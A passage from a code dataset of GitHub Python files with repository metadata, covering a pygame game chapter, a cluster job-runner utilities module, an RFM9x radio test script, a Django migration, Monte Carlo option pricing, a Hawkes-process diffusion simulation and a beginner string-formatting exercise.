self.cpt3_group)\n\n if self.goods_collision:\n if self.role.rect.x < self.goods_collision.rect.x:\n self.role.rect.right = self.goods_collision.rect.left\n else:\n self.role.rect.left = self.goods_collision.rect.right\n self.role.x_vel = 0\n\n def y_collide(self):\n '''\n judge whether there is collision in the y_axis. 
if yes, do something\n :return:\n '''\n self.goods_collision = pygame.sprite.spritecollideany(self.role, self.cpt3_group)\n if self.goods_collision:\n if self.role.rect.bottom < self.goods_collision.rect.bottom:\n self.role.rect.bottom = self.goods_collision.rect.top\n else:\n self.role.rect.top = self.goods_collision.rect.bottom\n self.role.y_vel = 0\n\n def update(self,surface,keys):\n if self.judge != 1:\n self.role.update(keys)\n tools.play_chatsound(default.chat_sound_start,self.chat_sound)\n self.update_position()\n self.find_talk(keys)\n self.mage.update()\n self.draw(surface,keys)\n\n\n\n def draw(self,surface,keys):\n surface.blit(self.image,(0,0))\n surface.blit(self.role.role_image,self.role.rect)\n surface.blit(self.mage.role_image,self.mage.rect)\n self.draw_items(self.judge,surface,keys)\n pass","repo_name":"johnycoco1212/radiant_knight","sub_path":"states/chapter_3.py","file_name":"chapter_3.py","file_ext":"py","file_size_in_byte":10680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"303791674","text":"import os\nimport io\nimport re\nimport sys\nimport pdb\nimport time\nimport types\nimport socket\nimport signal\nimport psutil\nimport logging\nimport argparse\nimport textwrap\nimport threading\nimport traceback\nimport contextlib\nimport pkg_resources\n\nfrom datetime import datetime\nfrom fractions import Fraction\nfrom threading import Thread, Lock\nfrom collections import Counter, deque\nfrom functools import total_ordering, wraps, partial\nfrom subprocess import check_output, call, Popen, PIPE\nfrom os.path import dirname, basename, isfile, isdir, exists, normpath, realpath, abspath, splitext, join, expanduser\n\nfrom .loger import *\nfrom .config import which\nfrom ._version import __version__\n\nPY3 = sys.version_info.major == 3\n\nif not PY3:\n from Queue import Queue, Empty\nelse:\n from queue import Queue, Empty\n\n\nQSUB_JOB_ID_DECODER = re.compile(\"Your job (\\d+) \\(.+?\\) has been submitted\")\n\n\nclass JobFailedError(Exception):\n\n def __init__(self, msg=\"\", jobs=None):\n self.msg = msg\n self.failed_jobs = jobs and [j for j in jobs if j.is_fail]\n\n def __str__(self):\n if self.msg:\n return self.msg\n fj = self.failed_jobs\n fj_names = [j.jobname for j in fj]\n fj_logs = [j.logfile for j in fj]\n return \"{} jobs {} failed, please check in logs: {}\".format(len(fj), fj_names, fj_logs)\n\n\nclass QsubError(Exception):\n pass\n\n\nclass JobRuleError(Exception):\n pass\n\n\nclass JobOrderError(Exception):\n pass\n\n\nclass JobQueue(Queue):\n\n def _init(self, maxsize):\n self._queue = set()\n\n def _qsize(self):\n return len(self._queue)\n\n def _put(self, item):\n self._queue.add(item)\n\n def _get(self, name=None):\n if name is not None:\n if name in self._queue:\n self._queue.remove(name)\n return name\n else:\n raise KeyError(name)\n return self._queue.pop()\n\n def __contains__(self, item):\n return item in self._queue\n\n def __str__(self):\n return self._queue.__str__()\n\n __repr__ = __str__\n\n @property\n def length(self):\n return self.qsize()\n\n @property\n def queue(self):\n return sorted(self._queue)\n\n def puts(self, *items, **kw):\n for item in items:\n self.put(item, **kw)\n\n def get(self, name=None, block=True, timeout=None):\n with self.not_empty:\n if not block:\n if not self._qsize():\n raise Empty\n elif timeout is None:\n while not self._qsize():\n self.not_empty.wait()\n elif timeout < 0:\n raise ValueError(\"'timeout' must be a non-negative number\")\n else:\n endtime 
= now() + timeout\n while not self._qsize():\n remaining = endtime - now()\n if remaining <= 0.0:\n raise Empty\n self.not_empty.wait(remaining)\n item = self._get(name)\n self.not_full.notify()\n return item\n\n\nclass ParseSingal(Thread):\n\n def __init__(self, obj=None):\n super(ParseSingal, self).__init__()\n signal.signal(signal.SIGINT, self.signal_handler)\n signal.signal(signal.SIGTERM, self.signal_handler)\n signal.signal(signal.SIGUSR1, self.signal_handler_us)\n self.daemon = True\n self.obj = obj\n\n def run(self):\n time.sleep(1)\n\n def _exit(self):\n self.obj.safe_exit()\n\n def signal_handler(self, signum, frame):\n self.obj.signaled = True\n self._exit()\n # os._exit(signum) # Force Exit\n sys.exit(signum) # SystemExit Exception\n\n def signal_handler_us(self, signum, frame):\n self.obj.signaled = True\n self._exit()\n raise QsubError(self.obj.err_msg)\n\n\nclass RunThread(Thread):\n\n def __init__(self, func, *args):\n super(RunThread, self).__init__()\n self.args = args\n self.func = func\n self.exitcode = 0\n self.exception = None\n self.exc_traceback = ''\n self.daemon = True\n\n def run(self):\n try:\n self._run()\n except Exception as e:\n self.exitcode = 1\n self.exception = e\n self.exc_traceback = ''.join(\n traceback.format_exception(*sys.exc_info()))\n\n def _run(self):\n try:\n self.func(*(self.args))\n except Exception as e:\n raise e\n\n\nclass DummyFile(object):\n def write(self, x):\n pass\n\n\nclass mute(object):\n\n def __init__(self, func):\n wraps(func)(self)\n\n def __call__(self, *args, **kwargs): # wrapper function\n if sys.version_info >= (3, 5):\n with open(os.devnull, 'w') as devnull:\n with contextlib.redirect_stdout(devnull):\n return self.__wrapped__(*args, **kwargs)\n else:\n sys.stdout = DummyFile()\n try:\n return self.__wrapped__(*args, **kwargs)\n finally:\n sys.stdout = sys.__stdout__\n\n def __get__(self, instance, cls): # wrapper instance method\n if instance is None:\n return self\n return types.MethodType(self, instance)\n\n\nclass MaxRetryError(Exception):\n pass\n\n\ndef retry(func=None, *, max_num=3, delay=5, callback=None):\n if func is None:\n return partial(retry, max_num=max_num, delay=delay, callback=callback)\n elif not callable(func):\n raise TypeError(\"Not a callable. 
Did you use a non-keyword argument?\")\n log = logging.getLogger()\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n try_num = 0\n while try_num < max_num+1:\n try_num += 1\n try:\n if try_num > 1:\n log.warning(\"retry %s\", try_num-1)\n res = func(*args, **kwargs)\n except Exception as e:\n if try_num > 1:\n log.error(\"retry %s error, %s\", try_num-1, e)\n else:\n log.error(e)\n if try_num <= max_num:\n time.sleep(delay)\n continue\n else:\n break\n else:\n raise MaxRetryError(\"max retry %s error\" % max_num)\n if callback:\n return callback(res)\n return res\n return wrapper\n\n\ndef getlog(logfile=None, level=\"info\", name=None):\n logger = logging.getLogger(name)\n if level.lower() == \"info\":\n logger.setLevel(logging.INFO)\n elif level.lower() == \"debug\":\n logger.setLevel(logging.DEBUG)\n if logfile is None:\n if logger.hasHandlers():\n return logger\n h = logging.StreamHandler(sys.stdout)\n else:\n h = logging.FileHandler(logfile, mode='w')\n h.setFormatter(Formatter())\n logger.addHandler(h)\n return logger\n\n\ndef style(string, mode='', fore='', back=''):\n STYLE = {\n 'fore': Formatter.f_color_map,\n 'back': Formatter.b_color_map,\n 'mode': Formatter.mode_map,\n 'default': {'end': 0},\n }\n mode = '%s' % STYLE[\"mode\"].get(mode, \"\")\n fore = '%s' % STYLE['fore'].get(fore, \"\")\n back = '%s' % STYLE['back'].get(back, \"\")\n style = ';'.join([s for s in [mode, fore, back] if s])\n style = '\\033[%sm' % style if style else ''\n end = '\\033[%sm' % STYLE['default']['end'] if style else ''\n return '%s%s%s' % (style, string, end)\n\n\nREQUIRED = style(\"(required)\", fore=\"green\", mode=\"bold\")\n\n\ndef get_job_state(state):\n s = state.lower() if state else state\n if s == 'running':\n return style(state, fore=\"cyan\")\n if s == 'finished':\n return style(state, fore=\"green\")\n elif s == 'waiting':\n return style(state, fore=\"white\")\n elif s == 'failed':\n return style(state, fore=\"red\")\n elif s == 'stopped':\n return style(state, fore=\"yellow\")\n else:\n return style(state, fore=\"white\")\n\n\ndef now():\n if hasattr(time, 'monotonic'):\n return time.monotonic()\n return time.time()\n\n\ndef seconds2human(s):\n m, s = divmod(s, 60)\n h, m = divmod(int(m), 60)\n return \"{:d}:{:02d}:{:04.2f}\".format(h, m, s)\n\n\ndef mkdir(*path):\n for p in path:\n if not isdir(p):\n try:\n os.makedirs(p)\n except:\n pass\n\n\ndef is_entry_cmd():\n prog = abspath(realpath(sys.argv[0]))\n return basename(prog) in \\\n list(pkg_resources.get_entry_map(__package__).values())[0].keys() \\\n and join(sys.prefix, \"bin\", basename(prog)) == prog\n\n\ndef terminate_process(pid):\n try:\n pproc = psutil.Process(pid)\n for cproc in pproc.children(recursive=True):\n # cproc.terminate() # SIGTERM\n cproc.kill() # SIGKILL\n # pproc.terminate()\n pproc.kill()\n except:\n pass\n\n\ndef call_cmd(cmd, verbose=False):\n shell = True\n if isinstance(cmd, list):\n shell = False\n if verbose:\n print(cmd)\n call(cmd, shell=shell, stdout=PIPE, stderr=PIPE)\n else:\n with open(os.devnull, \"w\") as fo:\n call(cmd, shell=shell, stdout=fo, stderr=fo)\n\n\ndef show_help_on_empty_command():\n if len(sys.argv) == 1:\n sys.argv.append('--help')\n\n\ndef is_sge_submit():\n if os.getenv(\"SGE_ROOT\") and which(\"qconf\"):\n hostname = splitext(socket.gethostname())[0]\n try:\n with os.popen(\"qconf -ss\") as fi:\n for line in fi:\n if line.strip() == hostname or splitext(line.strip())[0] == hostname:\n return True\n except:\n return False\n return False\n\n\ndef common_parser():\n p = 
argparse.ArgumentParser(add_help=False)\n common = p.add_argument_group(\"common arguments\")\n common.add_argument('-v', '--version',\n action='version', version=\"v\" + __version__)\n common.add_argument(\"-j\", \"--jobfile\", type=argparse.FileType('r'), nargs=\"?\", default=sys.stdin,\n help=\"input jobfile, if empty, stdin is used. \" + REQUIRED, metavar=\"\")\n common.add_argument(\"-n\", \"--num\", type=int,\n help=\"the max number of jobs running at the same time. (default: all of the jobfile, max 1000)\", metavar=\"\")\n common.add_argument(\"-s\", \"--startline\", type=int,\n help=\"which line number (1-based) to use for the first job. (default: %(default)s)\", metavar=\"\", default=1)\n common.add_argument(\"-e\", \"--endline\", type=int,\n help=\"which line number (inclusive) to use for the last job. (default: last line of the jobfile)\", metavar=\"\")\n common.add_argument('-d', '--debug', action='store_true',\n help='log debug info.', default=False)\n common.add_argument(\"-l\", \"--log\", type=str,\n help='append log info to file. (default: stdout)', metavar=\"\")\n common.add_argument('-r', '--retry', help=\"retry the failed job N times, 0 or negative means do not re-submit. (default: %(default)s)\",\n type=int, default=0, metavar=\"\")\n common.add_argument('-ivs', '--retry-ivs', help=\"retry the failed job after N seconds. (default: %(default)s)\",\n type=int, default=2, metavar=\"\")\n common.add_argument(\"-f\", \"--force\", default=False, action=\"store_true\",\n help=\"force to submit jobs even if already succeeded.\")\n common.add_argument(\"--dot\", action=\"store_true\", default=False,\n help=\"do not execute anything and print the directed acyclic graph of jobs in the dot language.\")\n common.add_argument(\"--local\", default=False, action=\"store_true\",\n help=\"submit your jobs in localhost, same as '--mode local'.\")\n common.add_argument(\"--strict\", action=\"store_true\", default=False,\n help=\"run in strict mode: on any error, clean all jobs and exit.\")\n common.add_argument(\"--quiet\", action=\"store_true\", default=False,\n help=\"suppress all output and logging\")\n common.add_argument('--max-check', help=\"maximal number of job status checks per second, fractions allowed. (default: %(default)s)\",\n type=float, default=3, metavar=\"\")\n common.add_argument('--max-submit', help=\"maximal number of jobs submitted per second, fractions allowed. (default: %(default)s)\",\n type=float, default=30, metavar=\"\")\n return p\n\n\ndef runsgeArgparser():\n parser = argparse.ArgumentParser(\n description=\"%(prog)s is a tool for managing parallel tasks from a specific shell script running in localhost, sge or batchcompute.\",\n parents=[common_parser()],\n formatter_class=CustomHelpFormatter,\n allow_abbrev=False)\n parser.add_argument(\"-wd\", \"--workdir\", type=str, help=\"work dir. (default: %(default)s)\",\n default=abspath(os.getcwd()), metavar=\"\")\n parser.add_argument(\"-N\", \"--jobname\", type=str,\n help=\"job name. (default: basename of the jobfile)\", metavar=\"\")\n parser.add_argument(\"-lg\", \"--logdir\", type=str,\n help='the output log dir. (default: \"%s/%s_*_log_dir\")' % (os.getcwd(), \"%(prog)s\"), metavar=\"\")\n parser.add_argument(\"-g\", \"--groups\", type=int, default=1,\n help=\"N lines to consume a new job group. 
(default: %(default)s)\", metavar=\"\")\n parser.add_argument('--init', help=\"command before all jobs, will be run on localhost.\",\n type=str, metavar=\"\")\n parser.add_argument('--call-back', help=\"command after all jobs finished, will be run on localhost.\",\n type=str, metavar=\"\")\n parser.add_argument('--mode', type=str, default=\"sge\", choices=[\n \"sge\", \"local\", \"localhost\", \"batchcompute\"], help=\"the mode to submit your jobs; if no sge is installed, localhost is always used. (default: %(default)s)\")\n parser.add_argument('-ini', '--ini',\n help=\"input configfile for configuration search.\", metavar=\"\")\n parser.add_argument(\"-config\", '--config', action='store_true',\n help=\"show configurations and exit.\", default=False)\n sge = parser.add_argument_group(\"sge arguments\")\n sge.add_argument(\"-q\", \"--queue\", type=str, help=\"the queue(s) your jobs run in, multiple queues can be separated by whitespace. (default: all accessible queues)\",\n nargs=\"*\", metavar=\"\")\n sge.add_argument(\"-m\", \"--memory\", type=int,\n help=\"the memory used per command (GB). (default: %(default)s)\", default=1, metavar=\"\")\n sge.add_argument(\"-c\", \"--cpu\", type=int,\n help=\"the number of cpus your job uses. (default: %(default)s)\", default=1, metavar=\"\")\n batchcmp = parser.add_argument_group(\"batchcompute arguments\")\n batchcmp.add_argument(\"-om\", \"--out-maping\", type=str,\n help='the oss output directory if your mode is \"batchcompute\", all output files will be mapped to your OSS://BUCKET-NAME. if not set, any output will be reserved.', metavar=\"\")\n batchcmp.add_argument('--access-key-id', type=str,\n help=\"AccessKeyID used to access oss.\", metavar=\"\")\n batchcmp.add_argument('--access-key-secret', type=str,\n help=\"AccessKeySecret used to access oss.\", metavar=\"\")\n batchcmp.add_argument('--region', type=str, default=\"beijing\", choices=['beijing', 'hangzhou', 'huhehaote', 'shanghai',\n 'zhangjiakou', 'chengdu', 'hongkong', 'qingdao', 'shenzhen'], help=\"batch compute region. (default: %(default)s)\")\n parser.description = style(\n parser.description, fore=\"red\", mode=\"underline\")\n return parser\n\n\ndef runjobArgparser():\n parser = argparse.ArgumentParser(\n description=\"%(prog)s is a tool for managing parallel tasks from a specific job file running in localhost or sge cluster.\",\n parents=[common_parser()],\n formatter_class=CustomHelpFormatter,\n allow_abbrev=False)\n parser.add_argument('-i', '--injname', help=\"job names you need to run. (default: all job names of the jobfile)\",\n nargs=\"*\", type=str, metavar=\"\")\n parser.add_argument(\"-m\", '--mode', type=str, default=\"sge\", choices=[\n \"sge\", \"local\", \"localhost\"], help=\"the mode to submit your jobs; if no sge is installed, localhost is always used. 
(default: %(default)s)\")\n parser.description = style(\n parser.description, fore=\"red\", mode=\"underline\")\n return parser\n\n\ndef shellJobArgparser(arglist):\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\"-q\", \"--queue\", type=str, nargs=\"*\")\n parser.add_argument(\"-m\", \"--memory\", type=int)\n parser.add_argument(\"-c\", \"--cpu\", type=int)\n parser.add_argument(\"-g\", \"--groups\", type=int)\n parser.add_argument(\"-n\", \"--jobname\", type=str)\n parser.add_argument(\"-om\", \"--out-maping\", type=str)\n parser.add_argument(\"-wd\", \"--workdir\", type=str)\n parser.add_argument('--mode', type=str)\n parser.add_argument(\"--local\", default=False, action=\"store_true\")\n return parser.parse_known_args(arglist)[0]\n\n\nclass AppDirs(object):\n \"\"\"Convenience wrapper for getting application dirs.\"\"\"\n\n def __init__(self, appname=None, version=None):\n self.appname = appname\n self.version = version\n\n @property\n def user_data_dir(self):\n path = os.getenv('XDG_DATA_HOME', os.path.expanduser(\"~/.local/share\"))\n return self.__user_dir(path)\n\n @property\n def site_data_dir(self):\n path = os.getenv('XDG_DATA_DIRS',\n os.pathsep.join(['/usr/local/share', '/usr/share']))\n return self.__site_dir(path)\n\n @property\n def site_config_dir(self):\n path = os.getenv('XDG_CONFIG_DIRS', '/etc/xdg')\n return self.__site_dir(path)\n\n @property\n def user_config_dir(self):\n path = os.getenv('XDG_CONFIG_HOME', os.path.expanduser(\"~/.config\"))\n return self.__user_dir(path)\n\n @property\n def user_cache_dir(self):\n path = os.getenv('XDG_CACHE_HOME', os.path.expanduser('~/.cache'))\n return self.__user_dir(path)\n\n @property\n def user_state_dir(self):\n path = os.getenv('XDG_STATE_HOME',\n os.path.expanduser(\"~/.local/state\"))\n return self.__user_dir(path)\n\n @property\n def user_log_dir(self):\n return os.path.join(self.user_cache_dir, \"log\")\n\n def __user_dir(self, path):\n if self.appname:\n path = os.path.join(path, self.appname)\n if self.appname and self.version:\n path = os.path.join(path, self.version)\n return path\n\n def __site_dir(self, path, multipath=False):\n pathlist = [os.path.expanduser(x.rstrip(os.sep))\n for x in path.split(os.pathsep)]\n appname = self.appname\n version = self.version\n if appname:\n if version:\n appname = os.path.join(appname, version)\n pathlist = [os.sep.join([x, appname]) for x in pathlist]\n if multipath:\n path = os.pathsep.join(pathlist)\n else:\n path = pathlist[0]\n return path\n\n\ndef user_config_dir(app=__package__, version=\"\"):\n app = AppDirs(app, version)\n return app.user_config_dir\n\n\nclass CustomHelpFormatter(argparse.HelpFormatter):\n\n def _get_help_string(self, action):\n \"\"\"Place default and required value in help string.\"\"\"\n h = action.help\n\n # Remove any formatting used for Sphinx argparse hints.\n h = h.replace('``', '')\n\n if '%(default)' not in action.help:\n if action.default != '' and action.default != [] and \\\n action.default is not None and \\\n not isinstance(action.default, bool) and \\\n not isinstance(action.default, io.IOBase):\n if action.default is not argparse.SUPPRESS:\n defaulting_nargs = [\n argparse.OPTIONAL, argparse.ZERO_OR_MORE]\n\n if action.option_strings or action.nargs in defaulting_nargs:\n if '\\n' in h:\n lines = h.splitlines()\n lines[0] += ' (default: %(default)s)'\n h = '\\n'.join(lines)\n else:\n h += ' (default: %(default)s)'\n if \"required\" not in action.help and hasattr(action, \"required\") and action.required:\n h 
+= \" \" + REQUIRED\n return h\n\n def _format_action_invocation(self, action):\n \"\"\"Removes duplicate ALLCAPS with positional arguments.\"\"\"\n if not action.option_strings:\n default = self._get_default_metavar_for_positional(action)\n metavar, = self._metavar_formatter(action, default)(1)\n return metavar\n\n else:\n parts = []\n\n # if the Optional doesn't take a value, format is:\n # -s, --long\n if action.nargs == 0:\n parts.extend(action.option_strings)\n\n # if the Optional takes a value, format is:\n # -s ARGS, --long ARGS\n else:\n default = self._get_default_metavar_for_optional(action)\n args_string = self._format_args(action, default)\n for option_string in action.option_strings:\n parts.append(option_string)\n\n return '%s %s' % (', '.join(parts), args_string)\n\n return ', '.join(parts)\n\n def _get_default_metavar_for_optional(self, action):\n return action.dest.upper()\n\n def _get_default_metavar_for_positional(self, action):\n return action.dest\n\n\nclass RateLimiter(object):\n \"\"\"Provides rate limiting for an operation with a configurable number of\n requests for a time period.\n \"\"\"\n\n def __init__(self, max_calls, period=1.0, callback=None):\n \"\"\"Initialize a RateLimiter object which enforces as much as max_calls\n operations on period (eventually floating) number of seconds.\n \"\"\"\n if period <= 0:\n raise ValueError('Rate limiting period should be > 0')\n if max_calls <= 0:\n raise ValueError('Rate limiting number of calls should be > 0')\n\n # We're using a deque to store the last execution timestamps, not for\n # its maxlen attribute, but to allow constant time front removal.\n self.calls = deque()\n\n self.period = period\n self.max_calls = max_calls\n self.callback = callback\n self._lock = Lock()\n\n # Lock to protect creation of self._alock\n self._init_lock = Lock()\n\n def __call__(self, f):\n \"\"\"The __call__ function allows the RateLimiter object to be used as a\n regular function decorator.\n \"\"\"\n @wraps(f)\n def wrapped(*args, **kwargs):\n with self:\n return f(*args, **kwargs)\n return wrapped\n\n def __enter__(self):\n with self._lock:\n # We want to ensure that no more than max_calls were run in the allowed\n # period. For this, we store the last timestamps of each call and run\n # the rate verification upon each __enter__ call.\n if len(self.calls) >= self.max_calls:\n until = time.time() + self.period - self._timespan\n if self.callback:\n t = Thread(target=self.callback, args=(until,))\n t.daemon = True\n t.start()\n sleeptime = until - time.time()\n if sleeptime > 0:\n time.sleep(sleeptime)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n with self._lock:\n # Store the last operation timestamp.\n self.calls.append(time.time())\n\n # Pop the timestamp list front (ie: the older calls) until the sum goes\n # back below the period. 
This is our 'sliding period' window.\n while self._timespan >= self.period:\n self.calls.popleft()\n\n @property\n def _timespan(self):\n return self.calls[-1] - self.calls[0]\n","repo_name":"yodeng/runjob","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":24497,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"22941094026","text":"import time\nimport FSK_test\nimport busio\nfrom digitalio import DigitalInOut, Direction, Pull\nimport board\n\n\nCS = DigitalInOut(board.CE1)\nRESET = DigitalInOut(board.D25)\nspi = busio.SPI(board.SCK,MOSI=board.MOSI, MISO=board.MISO)\n\nrfm9x = FSK_test.RFM9x(spi, CS, RESET, 915.0)\n\nrfm9x.tx_power = 23\n\ncurrent_temp = rfm9x.temperature_value()\n\nrfm9x.configure_temperature_threshold(5)\n\nrfm9x.gaussian_filter_calibration(10)\n\nprint(\"gaussian filter is \",rfm9x.current_gaussian_filter_used(), \"BT\")\n\ndata=bytes(\"please work\",\"utf-8\")\n\nprint(\"How many packets do you want sent?:\")\nnum_of_packets = input()\n\nprint(\"what gaussian filter setting?:\")\n\ngauss_fil = input()\n\nrfm9x.gaussian_filter_calibration(gauss_fil)\n\nprint(\"temp threshold?:\")\n\nthresh = input()\n\nrfm9x.configure_temperature_threshold(thresh)\n\nprint(\"what is the desired bitrate?\")\n\nbitrate_select = input()\n\nrfm9x.bitrate = float(bitrate_select)\n\n\n\nwhile True:\n \n rfm9x.send(data)\n \n print(\"data sent\")\n \n print(rfm9x.temp_threshold)\n \n print(current_temp)\n \n time.sleep(2)\n \n print(data)\n \n num_of_packets = int(num_of_packets) - 1\n \n if num_of_packets == 0:\n \n print(\"transmission over\")\n \n break\n \n \n\n","repo_name":"adamhuu/adam-and-christi-raspi-code-whoop-whoop","sub_path":"Main_fsk_test.py","file_name":"Main_fsk_test.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21958886166","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('characters', '0012_magenpc_is_npc'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='magenpc',\n name='is_npc',\n ),\n ]\n","repo_name":"wlansu/wod","sub_path":"wod/characters/migrations/0013_remove_magenpc_is_npc.py","file_name":"0013_remove_magenpc_is_npc.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36240916711","text":"from ..monte_carlo import monteCarloSkeleton, monteCarloStats\nfrom ...black_scholes.greeks import callDelta, putDelta\n\nimport numpy as np\n\n\ndef deltaCVBlackScholes(current: float, volatility: float, ttm: float,\n strike: float, rf: float, dividend: float, sim_count: int, eval_count: int, beta1: float, opt_type: str='C') -> dict:\n \"\"\"Function to model the price of a European Option, under the\n Black-Scholes pricing model heuristic, using a control variates method\n variance-reduced Monte-Carlo simulation.\n\n This function simulates a delta-hedged portfolio mimicking a call or put\n option, under the Black-Scholes pricing heuristic.\n\n Then, Monte Carlo simulation statistics are computed for each of the\n simulations, and a dict of results is returned.\n \n Arguments:\n current {float} -- Current price of the underlying asset.\n volatility {float} -- Volatility of the underlying asset price.\n ttm {float} -- Time to 
expiration (in years).\n strike {float} -- Strike price of the option contract.\n rf {float} -- Risk-free rate (annual).\n dividend {float} -- Dividend yield (annual).\n sim_count {int} -- Number of paths to simulate.\n eval_count {int} -- Number of evaluations per path simulation.\n beta1 {float} -- Beta coefficient for the delta hedge.\n \n Keyword Arguments:\n opt_type {str} -- Option type; must be 'C' or 'P' (default: {'C'}).\n \n Raises:\n ValueError: Raised if `opt_type` is not 'C' or 'P'.\n \n Returns:\n dict -- Formatted dictionary of Monte Carlo simulation results.\n \"\"\"\n\n # Verify option type choice\n if opt_type not in ['C', 'P']:\n raise ValueError('Incorrect option type; must be \"C\" or \"P\".')\n \n # Computing delta t\n dt = ttm / eval_count\n # Computing nudt\n nudt = (rf - dividend - (np.power(volatility, 2) / 2)) * dt\n # Delta bias correction\n erddt = np.exp((rf - dividend) * dt)\n\n # Building vector of ttms (for option delta evaluation)\n # Note: This starts from timestep 1, to timestep eval_count.\n # Note: This is the time to maturity, the order must be flipped to match\n # the simulated asset prices (at the first sim price\n # it is ((ttm - dt), (ttm - 2*dt), ...)\n ttm_vec = np.flip(np.arange(start=dt, stop=(ttm + dt), step=dt))\n\n # Defining lambda function to model underlying Geometric Brownian Motion,\n # and Delta-based control variate\n gbm = lambda x: nudt + (volatility * np.sqrt(dt) * x)\n\n # Defining simulation function\n def sim_func(x: np.array) -> float:\n # Underlying price path\n st = np.cumprod(np.exp(gbm(x))) * current\n\n if (opt_type == 'C'):\n # Call option\n # Delta computation\n delta = callDelta(current=st,\n volatility=volatility,\n ttm=ttm_vec,\n strike=strike,\n rf=rf,\n dividend=dividend)\n\n # Terminal payoff computation (future value)\n terminal_payoff = np.maximum(st[-1] - strike, 0)\n else:\n # Put option\n # Delta computation\n delta = putDelta(current=st,\n volatility=volatility,\n ttm=ttm_vec,\n strike=strike,\n rf=rf,\n dividend=dividend)\n # Terminal payoff computation (future value)\n terminal_payoff = np.maximum(strike - st[-1], 0)\n\n # Control variate computation\n cv = np.sum(delta[:-1] * (st[1:] - (st[:-1] * erddt)))\n\n # Adjusting estimate by control variate; returning present value\n return np.exp(-1 * rf * ttm) * (terminal_payoff + (cv * beta1))\n\n # Running simulation\n mc_output = monteCarloSkeleton(sim_count=sim_count,\n eval_count=eval_count,\n sim_func=sim_func)\n\n # Computing and returning sample statistics\n return monteCarloStats(mc_output=mc_output)\n","repo_name":"rukmal/fe621","sub_path":"fe621/monte_carlo/option_pricing/control_variates.py","file_name":"control_variates.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"}
{"seq_id":"26451401458","text":"import numpy as np\nimport scipy.stats\n\n\n# Exponential kernel modelling the time-decay effect\ndef kernel(current_time, history_time, omega):\n return omega * np.exp(-omega * (current_time - history_time))\n\n\n# Draw a sample from an exponential distribution with parameter namuta\ndef samplefromExponential(namuta):\n C = scipy.stats.expon(scale=namuta)\n rv = C.rvs()\n return rv\n\n\n# Compute the intensity of dimension i at time t\ndef cal_natmuta_i_sum(mu, alpha, omega, history, ajacencymatrix, t, i):\n namutai = mu[i]\n '''his=(retweeter,tweeter,time)'''\n for his in history:\n if ajacencymatrix[i][his[0]] == 1:\n namutai += alpha[his[0]][i] * kernel(t, his[2], omega)\n return namutai\n\n\n# Compute the total intensity over all dimensions at time t\ndef cal_namutastarsum(mu, alpha, omega, history, ajacencymatrix, 
t):\n dim = mu.shape[0]\n sum = 0.0\n for i in range(dim):\n sum += cal_natmuta_i_sum(mu, alpha, omega, history, ajacencymatrix, t, i)\n return sum\n\n\n# 基于霍克斯过程的预测\ndef multidimensional_sim(mu, alpha, omega, T, ajacencymatrix, numEvents):\n history = []\n hiswithouttime = []\n dim = mu.shape[0]\n t = 0.0\n # 由于数据中节点总数只有100个,这里选择pagerank值最高的节点作为初始节点\n n0 = 65\n namutahat = 0.0\n namutastarsum = 0.0\n history.append((n0, n0, t))\n count = 1\n quit=False\n while count <= numEvents:\n '''begin sample nextevent'''\n namutastarsum = cal_namutastarsum(mu, alpha, omega, history, ajacencymatrix, t)\n namutahat = namutastarsum\n # s:从namutahat的指数分布中采样得到:\n s = samplefromExponential(namutahat)\n t += s\n if t >= T:\n break\n '''start rejection test'''\n namutapingjun = cal_namutastarsum(mu, alpha, omega, history, ajacencymatrix, t) # 这里的t是t‘\n d = np.random.uniform(0, 1, 1)\n if d * namutahat > namutapingjun:\n continue\n '''start attribution test'''\n d = np.random.uniform(0, 1, 1)\n capital_S = 0.0\n for i in range(dim):\n quit=False\n capital_S += cal_natmuta_i_sum(mu, alpha, omega, history, ajacencymatrix, t, i)\n if capital_S >= d:\n for j in range(len(history) - 1, -1, -1):\n retw = [(x[0]) for x in history]\n if (ajacencymatrix[i][history[j][0]] == 1) and i not in retw: # 转发过一次就不能在转发第二次了\n history.append((i, history[j][0], t))\n count += 1\n quit=True\n break\n if quit:\n break\n\n his = []\n #print(count)\n\n for i in range(len(history)):\n his.append((history[i][0], history[i][1], i))\n\n return his","repo_name":"WeiMin-Li-visual/infdiffusion","sub_path":"algorithm/hawkesProcess.py","file_name":"hawkesProcess.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15534122360","text":"types_of_people = 10 # define the variable\nx = f\"There are {types_of_people} types of people.\" # print that how many types of people are there, with the use of print(f\"\"\")\n\nbinary = \"binary\" # define the variable\ndo_not = \"don't\" # define the variable\ny = f\"Those who know {binary} and those who {do_not}.\" # define the variable\n\nprint(x)\nprint(y)\n\nprint(f\"I said: {x}\")\nprint(f\"I also said: '{y}\")\n\nhilarious = \"False\"\njoke_evaluation = \"Isn't that joke so funny?! 
